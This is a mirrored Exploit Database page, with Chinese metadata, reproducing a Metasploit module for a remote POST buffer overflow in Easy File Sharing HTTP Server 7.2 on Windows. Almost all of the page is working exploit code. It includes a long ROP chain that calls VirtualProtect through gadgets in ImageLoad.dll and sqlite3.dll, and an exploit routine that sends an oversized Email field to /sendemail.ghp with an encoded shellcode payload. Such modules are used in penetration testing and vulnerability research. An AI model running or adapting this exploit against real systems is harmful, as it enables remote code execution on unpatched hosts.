Easy File Sharing HTTP Server 7.2 – POST Buffer Overflow (Metasploit)

• Exploit Database
• 18 阅读

• 作者： Metasploit
  日期： 2017-06-17
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42256/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::Tcp
  #include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Easy File Sharing HTTP Server 7.2 POST Buffer Overflow',
  'Description'=> %q{
  This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
  },
  'Author' =>
  [
  'bl4ck h4ck3r', #POC
  'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
  ],
  'License'=> MSF_LICENSE,
  'References' =>
  [
  [ 'EDB', '42186' ],
  ],
  'Privileged' => true,
  'Payload'=>
  {
  'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
  },
  'Platform' => 'win',
  'Targets'=>
  [
  [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x1002280a } ],
  ],
  'DefaultOptions' => {
  'RPORT' => 80,
  'EXITFUNC' => 'thread',
  'ENCODER' => 'x86/alpha_mixed'
  },
  'DisclosureDate' => 'Jun 12 2017',
  'DefaultTarget'=> 0))
  end
  
  def create_rop_chain
  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets = [
  # 0x00000000,# [-] Unable to find gadget to put 00000201 into ebx
  0x10015442,# POP EAX # RETN [ImageLoad.dll]
  0xFFFFFDFE,# -202
  0x100231d1,# NEG EAX # RETN [ImageLoad.dll]
  0x1001da09,# ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]| {PAGE_EXECUTE_READ}
  0x1001a858,# RETN (ROP NOP) [ImageLoad.dll]
  0x1001a858,# RETN (ROP NOP) [ImageLoad.dll]
  0x10015442,# POP EAX # RETN [ImageLoad.dll]
  0x1004de84,# &Writable location [ImageLoad.dll]
  0x10015442,# POP EAX # RETN [ImageLoad.dll]
  0x61c832d0,# ptr to &VirtualProtect() [IAT sqlite3.dll]
  0x1002248c,# MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
  0x61c0a798,# XCHG EAX,EDI # RETN [sqlite3.dll]
  0x1001d626,# XOR ESI,ESI # RETN [ImageLoad.dll]
  0x10021a3e,# ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
  0x100218f9,# POP EBP # RETN [ImageLoad.dll]
  0x61c24169,# & push esp # ret[sqlite3.dll]
  0x10022c4c,# XOR EDX,EDX # RETN [ImageLoad.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x61c066be,# INC EDX # ADD CL,CL # RETN [sqlite3.dll]
  0x1001bd98,# POP ECX # RETN [ImageLoad.dll]
  0x1004de84,# &Writable location [ImageLoad.dll]
  0x61c373a4,# POP EDI # RETN [sqlite3.dll]
  0x1001a858,# RETN (ROP NOP) [ImageLoad.dll]
  0x10015442,# POP EAX # RETN [ImageLoad.dll]
  0x90909090,# nop
  0x100240c2,# PUSHAD # RETN [ImageLoad.dll]
  ].flatten.pack('V*')
  return rop_gadgets
  end
  
  def exploit
  sploit = rand_text_alpha_upper(2278)
  rop_chain = create_rop_chain
  sploit << rop_chain
  sploit << "\x90" * 200
  sploit << payload.encoded
  sploit << rand_text_alpha_upper(1794 - 200 - payload.encoded.length - rop_chain.length)
  sploit << [target.ret].pack('V')
  
  request = "POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=#{sploit}&getPassword=Get+Password"
  connect
  sock.put(request)
  handler
  disconnect
  end
  end